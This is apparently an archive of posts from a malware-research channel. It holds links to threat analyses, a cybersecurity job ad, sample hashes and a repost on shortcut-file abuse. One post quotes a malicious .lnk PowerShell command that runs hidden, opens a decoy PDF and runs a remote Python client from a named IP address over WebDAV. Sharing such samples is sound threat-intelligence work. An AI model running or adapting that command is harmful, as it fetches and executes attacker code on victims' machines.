Source Byte


It takes a sober person to abstain from love, and this nature of mine does not mingle with reason. Saadi Shirazi 187

Post archive
Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations
https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/

Dark web threats and dark market predictions for 2025
https://securelist.com/ksb-dark-web-predictions-2025/114966/

Agent Tesla Analysis [Part 1: Unpacking]
https://ryan-weil.github.io/posts/AGENT-TESLA-1/
Deobfuscation of Lumma Stealer
https://ryan-weil.github.io/posts/LUMMA-STEALER/

Hi, one thing I forgot to mention :/ these job opportunities are CTI & TR at the time and are only available in Tehran. Have a nice day 😬

There is a job opportunity in the field of cybersecurity. If you are interested in working in this field, please send your resume via linkedin [ HERE ] or via telegram [ @AleeAmini ].
[ + ] Familiarity with reverse engineering and malware analysis.
[ + ] Familiarity with one of the programming languages Python, C/Cpp.
[ + ] Familiarity with Linux operating system
[ + ] Familiarity with security concepts.
[ + ] Familiarity with Python, PowerShell and Bash scripting.
[ + ] Familiarity with cyber attacks
Skills that are considered as advantages:
[ + ] Familiarity with Threat Intelligence
[ + ] Familiarity with CTI concepts
[ + ] Mastery of reverse engineering and binary analysis
[ + ] Familiarity with Windows/Linux internals

19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc.lnk (0.03 KB)

or even run python remotely
-w hid -nop  -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"

fdc240fb8f4a17e6a2b0d26635d8ab613db89135a5d95834c5a888423d2b1c82.zip (9.09 KB)

https://cyble.com/blog/ursnif-trojan-hides-with-stealthy-tactics/
lnk are so strange you can literally do anything with them and yet no security log to detect them :(

Repost from Infosec Fortress
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access 🔗 Link #redteam #initial_access ——— 🆔 @Infosec_Fortress


Thanks "a gh" for sharing the missing files (two Windows event logs). Password is infected

Just an attempt to group extracted data from Defender for research purposes.
https://github.com/HackingLZ/ExtractedDefender
Credits: Justin Elze

Catalog of key Windows kernel data structures
https://codemachine.com/articles/kernel_structures.html
Understanding EProcess Structure
https://info-savvy.com/understanding-eprocess-structure/
Thanks to https://x.com/5mukx